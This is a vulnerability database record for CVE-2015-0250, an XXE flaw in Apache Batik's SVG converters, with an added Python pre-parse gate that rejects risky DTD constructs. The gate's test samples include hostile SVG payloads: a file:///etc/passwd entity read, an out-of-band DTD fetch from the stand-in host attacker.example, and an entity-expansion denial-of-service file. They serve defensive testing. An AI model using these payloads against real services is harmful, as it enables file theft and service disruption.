ID CVE-2015-0250
Summary XML external entity (XXE) vulnerability in the SVG to (1) PNG and (2) JPG conversion classes in Apache Batik 1.x before 1.8 allows remote attackers to read arbitrary files or cause a denial of service via a crafted SVG file. CWE-611: Improper Restriction of XML External Entity Reference ('XXE') (http://cwe.mitre.org/data/definitions/611.html)
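What the summary describes in practice, as an added example that is not part of this record or of Apache Batik: a pre-parse gate, written here in Python, that inspects an SVG's DTD with all external resolution switched off and rejects the constructs a permissive XML parser (such as the one behind Batik 1.x's PNG/JPG transcoders before 1.8) would act on: entity declarations, SYSTEM identifiers dereferenced in content, and unknown external DTDs. The sample SVGs are constructed for the example; `attacker.example`, `file:///etc/passwd` as the target and the `KNOWN_SVG_DTDS` allowlist are assumptions, not details from the advisory. The fix for the CVE itself is upgrading to Batik 1.8 or later; a gate like this is defense in depth in front of a conversion service.

```python
# Added example (not Apache Batik code): a DTD gate that runs before an
# untrusted SVG reaches an XML-based converter. Python's bundled expat
# binding is used in a mode that never resolves anything; it only reports
# what the document's DTD would make a permissive parser do.
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
import xml.parsers.expat as expat

# Assumed policy: the only external DTDs a legitimate SVG editor emits are
# the W3C ones, which a renderer should serve from a local copy, not fetch.
KNOWN_SVG_DTDS = {
    "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd",
    "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd",
}


@dataclass
class DtdReport:
    has_doctype: bool = False
    external_dtd: Optional[str] = None  # SYSTEM id given on the DOCTYPE itself
    entities: List[Tuple[str, bool, Optional[str]]] = field(default_factory=list)  # (name, is_param, system_id)
    external_refs: List[str] = field(default_factory=list)  # SYSTEM ids a parser would open for content
    skipped: List[str] = field(default_factory=list)  # entity references that could not be resolved
    parse_error: Optional[str] = None

    @property
    def safe(self) -> bool:
        # An SVG handed to a converter never needs to declare entities; a
        # DOCTYPE is tolerated only if it points at a known DTD or nowhere.
        if self.parse_error or self.entities or self.external_refs or self.skipped:
            return False
        return self.external_dtd is None or self.external_dtd in KNOWN_SVG_DTDS


def inspect_svg(data: bytes) -> DtdReport:
    """Parse `data` with external resolution disabled and report its DTD usage."""
    report = DtdReport()
    p = expat.ParserCreate()
    # Never expand parameter entities or load the external subset.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report.has_doctype = True
        report.external_dtd = system_id

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        report.entities.append((name, bool(is_param), system_id))

    def on_external_ref(context, base, system_id, public_id):
        # A vulnerable parser would open system_id here (file://, http://, ...).
        report.external_refs.append(system_id)
        return 1  # keep parsing, but without fetching anything

    def on_skipped(name, is_param):
        report.skipped.append(name)

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity_decl
    p.ExternalEntityRefHandler = on_external_ref
    p.SkippedEntityHandler = on_skipped
    try:
        p.Parse(data, True)
    except expat.ExpatError as exc:
        report.parse_error = str(exc)
    return report


# Constructed samples. EDITOR_SVG carries the DOCTYPE many drawing tools
# emit; XXE_SVG is the file-read shape the CVE summary describes; OOB_SVG
# and LAUGHS_SVG are the out-of-band and entity-expansion (DoS) variants.
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>
"""
EDITOR_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>
"""
XXE_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg xmlns="http://www.w3.org/2000/svg"><text x="0" y="12">&xxe;</text></svg>
"""
OOB_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [ <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd; ]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&exfil;</text></svg>
"""
LAUGHS_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY a "aaaaaaaaaa">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&c;</text></svg>
"""

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_SVG), ("editor", EDITOR_SVG),
                       ("xxe", XXE_SVG), ("oob", OOB_SVG), ("laughs", LAUGHS_SVG)]:
        print(label, inspect_svg(doc))
```

The gate rejects on declaration, not on expansion: the `xxe` entity is flagged when it is declared and again when `&xxe;` would have made the parser open `file:///etc/passwd`, while the LAUGHS variant is caught although it touches no external resource. The same check could be done on the Java side before handing the bytes to Batik, with the same policy: no entity declarations, no unknown external DTDs.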
References
Vulnerable Configurations
  • cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*
  • cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*
  • cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:-:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.0:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:rc1:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:rc2:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:rc3:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:rc4:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1.1:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta1:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta2:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta3:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta4:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta4b:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta5:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5.1:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5.1:rc2:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.6:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.6.1:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.7:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.7:beta1:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.1:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.2:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.1.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.2.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.3.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.3.1:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.1:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.3:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.1.2:*:*:*:*:*:*:*
CVSS
Base: 6.4 (as of 04-11-2017 - 01:29)
Impact: 4.9 (subscore derived from the vector below)
Exploitability: 10.0 (subscore derived from the vector below)
CWE NVD-CWE-Other
CAPEC
Access
  Vector: NETWORK
  Complexity: LOW
  Authentication: NONE
Impact
  Confidentiality: PARTIAL
  Integrity: NONE
  Availability: PARTIAL
cvss-vector via4 AV:N/AC:L/Au:N/C:P/I:N/A:P
redhat via4
advisories
  • rhsa
    id RHSA-2016:0041
  • rhsa
    id RHSA-2016:0042
refmap via4
confirm
debian DSA-3205
fulldisc 20150322 [CVE-2015-0250] Apache Batik Information Disclosure Vulnerability (XXE Injection)
mandriva MDVSA-2015:203
misc http://packetstormsecurity.com/files/130964/Apache-Batik-XXE-Injection.html
sectrack 1032781
ubuntu USN-2548-1
Last major update 04-11-2017 - 01:29
Published 24-03-2015 - 17:59
Last modified 04-11-2017 - 01:29